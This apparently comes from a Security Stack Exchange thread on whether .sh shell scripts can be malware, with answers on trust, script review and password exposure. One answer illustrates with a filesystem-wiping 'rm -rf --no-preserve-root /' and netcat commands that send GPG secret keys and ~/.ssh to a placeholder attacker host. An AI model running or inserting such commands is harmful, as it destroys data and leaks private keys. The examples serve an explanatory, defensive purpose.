15

Can a .sh file be a virus or something harmful? Is it like .exe files on Windows? If yes, can someone read this script** and tell me if it safe and does it affect GnuPG security? It gives me an option to encrypt files with a right-click on Ubuntu.

**[mod note: link removed since we no longer analyse code]

schroeder
  • 123,438
  • 55
  • 284
  • 319
rezx
  • 1,039
  • 3
  • 12
  • 20

5 Answers5

40

.sh files are shell scripts. They are analogous to .bat files (cmd scripts) under Windows. All of these (shell scripts, cmd scripts, .exe Windows executables, Linux executables (which usually have no extension)) are executable programs; if you run one, it can do anything you can do. So yes, shell scripts can be harmful. Treat a shell script (or a Perl script, or a Python script, or a Ruby script, etc.) with the same suspicion you would treat any other application.

It's a bit harder to hide malware in a shell script without looking suspicious, because this is a script which can be read by people with knowledge of the scripting language. But it is not much harder; few people, even with the technical knowledge, would bother to review the code, so you could hope to go unnoticed.

As a practical matter, there is less malware for Linux floating around than for Windows. This is probably mainly because Linux has a lot less of a market share than Windows on the desktop, so the payback for writing Linux malware is less. Also, there is a long-ingrained culture of sharing little improvements to the system in the Linux world, more so than in the Windows world; so the balance of probability says that this is someone sharing a little improvement and not malware. But it could be malware posing as a little improvement. In the end, you need to decide whether you can trust the site where you're getting this application, or the people who recommended this site. Favor programs that come from your distribution (i.e. that you can install from the software center), as they have undergone some review.


Now regarding this specific program: I had a quick look, and it looks benign. I didn't see anything that would store your password anywhere without telling you or that would do things on your computer other than what it's advertised to do. Note that I only did a 2-minute review, which any remotely clever malware writer could get past. The program looks reasonably well-written.

I wouldn't necessarily recommend this program unless you feel a pressing need that isn't addressed by packages in the Ubuntu distribution. Ubuntu comes with the seahorse Install seahorse GUI frontend to GPG (there is also kgpg Install kgpg for KDE users). You may also want to install seahorse-nautilus Install seahorse-nautilus (or seahorse-plugin Install seahorse-plugin in older versions) for Nautilus integration.

Glorfindel
  • 2,235
  • 6
  • 18
  • 30
Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
8
#!/bin/sh
rm -rf --no-preserve-root /

That's malware, and it's a shell script. A more advanced version might include something like:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

So yes, a shell script can be malicious. It can get more complex and call on other scripting languages, libraries, or even be a shell archive that spits out and calls a regular executable.

For the most part, anything you run gets the permissions of the user.

Jeff Ferland
  • 38,090
  • 9
  • 93
  • 171
2

Of course! It can do anything you can do! Watch logs, keylog you, steal files etc....

Depending on what its Developer has written on the source code! It can do ANYTHING.....

And it is very easy to make, so if you are sent a suspicious .sh file, think twice before you execute it!

ant0nisk
  • 211
  • 1
  • 4
2

A sh file can be a traditional file infecting virus:

Both articles include source code for (older) sh viruses, although one or both have a typo that keep them from working properly today. It's an easy fix, as I recall. Both articles appeared in the late, lamented

Computing Systems Volume 2, Number 2, Spring, 1989

That's nearly 25 years ago.

In a slightly different vein, the VAX/VMS network worms Father Xmas and WANK were both written in the VMS "shell script" language, DCL.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
Bruce Ediger
  • 4,552
  • 2
  • 25
  • 26
1

A Unix shell script can be a virus, worm, a Trojan horse, a spyware, a logic bomb

If a shell script is run by a privileged account, most notably root or adm, then this shell script may cause any sort of damage. It can stop the system, send back all your E-mail to any kind of commanding host, change your Unix machine into a denial of service weapon, and much much worse…

Most of this bad behaviour will be easily discovered by a serious analysis of a shell script. Hence the fact that a shell script is a weapon won't stay secret.

Why aren't shell script more often used to destroy all the Unixes boxes? Simply because their users don't work on their OS with the same level of privileges.

  • Most Unixes user, even sysadmin, never work on their system, even their personnel one, logged in as an admin.
  • Most Windows users, even non sysdamin, always work on their system, even a professionnal one, logged in as an admin.


The 2 shell scripts you proposed to use don't exhibit any use of dangerous commands. They don't do any kind of home call, they don't hide any back door on the system. But they do collect your user password within a variable $PASS so as to be able to use sudo without asking your password everytime. Anyone on your system could see through the right use of ps arguments the value of this shell environnement variable i.e. your password. Subsequently, any other user of your system can use your account and aquire root privilege through sudo. Hence I wouldn't advise you to use such a kind of shell script.
dan
  • 3,033
  • 14
  • 34
  • 1
    A shell script can be a virus, even with the traditional definition of "virus": It is quite easy to write a shell script that injects itself into another shell script, for example `.profile`. Why .profile? Because that's a good place to prefix the `PATH` in order to provide wrappers for `su`, `sudo`, `ssh`. – Hendrik Brummermann Jun 03 '12 at 14:12
  • 1
    There are good and bad things in this answer. The distinction between “shell script source” and “shell script” is immaterial: the files are the same, the extension doesn't matter. Whether the user is logged as administrator isn't very important; most malware targets user accounts, and administrative access is important for malware only because it can hide better. – Gilles 'SO- stop being evil' Jun 03 '12 at 23:31
  • 1
    Environment variables are not visible to other users under Linux (I think they used to be, but that was a very long time ago). Command line arguments are. (Check the permissions in e.g. `/proc/1`.) – Gilles 'SO- stop being evil' Jun 03 '12 at 23:33
  • -> Gilles: a shell script source and a shell script differs in their modes. The 1st is typically `644` when the second is `755`. Otherwise what would be the need to make such a clear separation between a source and its executable version? Where is the need for this rule in all make's on all Unixes? – dan Jun 04 '12 at 08:58